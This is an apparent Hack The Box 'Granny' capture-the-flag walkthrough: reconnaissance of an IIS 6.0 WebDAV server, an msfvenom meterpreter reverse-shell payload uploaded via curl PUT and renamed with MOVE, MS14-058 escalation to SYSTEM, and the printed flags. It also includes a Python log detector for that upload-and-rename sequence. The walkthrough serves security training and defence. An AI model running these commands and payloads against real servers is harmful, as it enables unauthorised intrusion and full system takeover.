Hack The Box – Granny – Walkthrough

An application called FrontPage is running on port 80.

# nmap -A -n -F -T5 granny.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:09 UTC
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 67.33% done; ETC: 13:09 (0:00:01 remaining)
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.045s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Tue, 18 Aug 2020 13:15:25 GMT
|   WebDAV type: Unknown
|_  Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP LaserJet 4250 printer (92%), OSRAM Lightify ZigBee gateway (91%), Microsoft Xbox game console (modified, running XboxMediaCenter) (91%), Denver Electronics AC-5000W MK2 camera (90%), Nintendo Wii game console (89%), SMC SMC8014WG WAP (89%), HP 170X print server or Inkjet 3000 printer (89%), HP PSC 2400-series Photosmart printer (88%), HP ProCurve 2524 switch or 9100c Digital Sender printer (88%), Netgear WGR614v7 wireless broadband router (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# nmap -T4 --script vuln 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:10 UTC
Nmap scan report for 10.10.10.15
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /_vti_bin/: Frontpage file or folder
|   /_vti_log/: Frontpage file or folder
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|   /_vti_bin/shtml.exe: Frontpage file or folder
|   /images/: Potentially interesting folder
|_  /_private/: Potentially interesting folder
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

WebDAV is enabled and file upload is possible.

# perl nikto.pl -h http://granny.htb/
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    granny.htb
+ Target Port:        80
+ Start Time:         2020-08-18 15:01:46 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (MKCOL COPY SEARCH PROPFIND LOCK PROPPATCH UNLOCK listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ Retrieved x-aspnet-version header: 1.1.4322
+ 8110 requests: 6 error(s) and 26 item(s) reported on remote host
+ End Time:           2020-08-18 15:41:16 (GMT0) (2370 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# davtest --url http://granny.htb/
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://granny.htb
********************************************************
NOTE    Random string for this session: 1qjcRJmh6BgKgoh
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh
********************************************************
 Sending test files
PUT     html    SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
PUT     php     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php
PUT     asp     FAIL
PUT     cgi     FAIL
PUT     jsp     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp
PUT     jhtml   SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml
PUT     shtml   FAIL
PUT     txt     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
PUT     aspx    FAIL
PUT     cfm     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm
PUT     pl      SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl
********************************************************
 Checking for test file execution
EXEC    html    SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
EXEC    php     FAIL
EXEC    jsp     FAIL
EXEC    jhtml   FAIL
EXEC    txt     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
EXEC    cfm     FAIL
EXEC    pl      FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl
Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt

# echo "Test" > test.html

# curl -X PUT http://granny.htb/test.html -d @test.html

# curl http://granny.htb/test.html
Test

Upload the exploit code and obtain a shell.

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.21 LPORT=4444 -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2716 bytes
Saved as: shell.aspx

# mv shell.aspx shell.txt

# curl -X PUT http://granny.htb/shell.txt --data-binary @shell.txt

# curl -X MOVE --header 'Destination:http://granny.htb/shell.aspx' 'http://granny.htb/shell.txt'
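From the defender's side, the upload-then-rename sequence above leaves a recognisable trace in the IIS W3C logs. The following is an added example, not part of the original walkthrough: it parses IIS 6.0 W3C extended log records (default field set) and flags anonymous WebDAV writes, a PUT followed by a MOVE of the same resource from the same client, and a subsequent GET of a script extension. The log lines are constructed; the IPs, user agents and timestamps are assumptions.

```python
import re
from datetime import datetime

# Constructed IIS 6.0 W3C extended log (default field set); the entries from
# 10.10.14.21 mirror the PUT-then-MOVE-then-GET sequence shown above.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-08-20 14:01:10 10.10.10.15 GET /index.htm - 80 - 10.10.14.5 Mozilla/5.0 200 0 0
2020-08-20 14:02:03 10.10.10.15 OPTIONS / - 80 - 10.10.14.21 curl/7.68.0 200 0 0
2020-08-20 14:02:41 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.21 curl/7.68.0 201 0 0
2020-08-20 14:03:02 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.21 curl/7.68.0 201 0 0
2020-08-20 14:04:58 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.21 curl/7.68.0 200 0 0
2020-08-20 14:10:00 10.10.10.15 PROPFIND /images/ - 80 - 10.10.14.5 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
"""

# WebDAV/HTTP methods that change content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# Extensions IIS 6 hands to a script engine rather than serving as static files.
EXEC_EXT = re.compile(r"\.(aspx?|asa|cer|cdx|php|jsp|cfm|pl)$", re.I)


def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def detect_webdav_abuse(text, window_seconds=120):
    """Return (kind, client_ip, method, uri) findings. The Destination header of a
    MOVE is not in the default log fields, so the rename is inferred from a PUT
    and a MOVE of the same URI by the same client within window_seconds."""
    findings = []
    last_put = {}  # c-ip -> (timestamp, uri) of that client's latest successful PUT
    for rec in parse_w3c(text):
        method, status, ip, uri = rec["cs-method"], rec["sc-status"], rec["c-ip"], rec["cs-uri-stem"]
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        if method in WRITE_METHODS and status.startswith("2"):
            if rec["cs-username"] == "-":  # unauthenticated client modified content
                findings.append(("anonymous-write", ip, method, uri))
            if method == "PUT":
                last_put[ip] = (ts, uri)
            elif method == "MOVE" and ip in last_put:
                put_ts, put_uri = last_put[ip]
                if put_uri == uri and (ts - put_ts).total_seconds() <= window_seconds:
                    findings.append(("rename-after-upload", ip, method, uri))
        elif method == "GET" and status == "200" and ip in last_put and EXEC_EXT.search(uri):
            findings.append(("exec-after-upload", ip, method, uri))
    return findings
```

Against the sample the PROPFIND from the MiniRedir client produces no finding, while the curl client yields four: two anonymous writes, the rename, and the GET of the renamed .aspx.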

# msfconsole

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0

msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444

Requesting the uploaded page on the site yields a session. The session drops quickly, so background it immediately.

[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:34020) at 2020-08-20 14:04:59 +0000

background

Background session 1? [y/N]  y

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell sparc/bsd               172.17.0.2:4444 -> 172.17.0.1:34058 (172.17.0.1)

In other writeups the Type was Windows, but for some reason here it was sparc/bsd. This caused me quite a bit of trouble.

Finding vulnerabilities from sysinfo

The step of collecting the sysinfo data is omitted here.

# python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo /home/shimizu/granny/systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done

Obtaining administrator privileges via MS14-058

msf5 exploit(multi/handler) > use windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.21
LHOST => 10.10.14.21
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.17.0.1 - Command shell session 1 closed.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:34062) at 2020-08-20 14:23:31 +0000
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ GRANNY  172.17.0.2:4444 -> 172.17.0.1:34062 (10.10.10.15)

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 2
SESSION => 2
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 3620 launched.
[*] Reflectively injecting the exploit DLL into 3620...
[*] Injecting exploit into 3620...
[*] Exploit injected. Injecting payload into 3620...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:34066) at 2020-08-20 14:24:25 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 2128 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>cd C:\Documents and Settings\Lakis\Desktop
cd C:\Documents and Settings\Lakis\Desktop\

C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
700c5dc163014e22b3e408f8703f67d1

C:\Documents and Settings\Lakis\Desktop>cd C:\Documents and Settings\Administrator\Desktop
cd C:\Documents and Settings\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9